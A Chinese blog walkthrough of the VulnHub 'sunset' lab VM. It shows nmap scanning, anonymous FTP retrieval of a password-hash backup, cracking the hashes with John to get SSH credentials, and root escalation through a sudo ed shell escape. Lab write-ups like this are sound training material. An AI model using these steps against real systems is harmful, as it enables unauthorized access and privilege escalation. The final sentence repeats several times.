vulnhub之sunset的实践
2023-12-11 08:56:20 Author: 云计算和网络安全技术实践(查看原文) 阅读量:5 收藏

今天实践的是vulnhub的sunset镜像,

下载地址,https://download.vulnhub.com/sunset/sunset.zip,

用virtualbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.0.0/24,

获取到靶机地址192.168.0.179,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.179,

获取到靶机有21端口的ftp服务,22端口的ssh服务,

ftp服务是Anonymous FTP login allowed,直接登录,

ftp 192.168.0.179,用户名anonymous,密码直接回车,

查看当前目录,ls,下载文件,get backup,退出ftp,quit,

查看下载的文件内容,cat backup,是几个用户名和密码哈希值,

把用户名和密码哈希值保存到文件,vim hash,

用jonh进行暴力破解,john hash,获取到用户名密码sunset/cheer14,

ssh登录,ssh [email protected]

id确认不是root,需要提权,sudo -l查看root权限的程序,

获取到/usr/bin/ed,去GTFOBins上搜索ed,获取到提权方法,

执行sudo /usr/bin/ed,继续执行!/bin/sh,获取到新的shell,

id确认是root,

本周的实践比较简单,就进行到这里,本周的实践比较简单,就进行到这里,本周的实践比较简单,就进行到这里,本周的实践比较简单,就进行到这里,本周的实践比较简单,就进行到这里。


文章来源: http://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650748098&idx=1&sn=88666c1168d70825a28fc1cd86c1efcc&chksm=871495c2b0631cd4a94005652848fa10b6c8317699d172f77fd71516e5cd26d6a7ba1cab5409&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh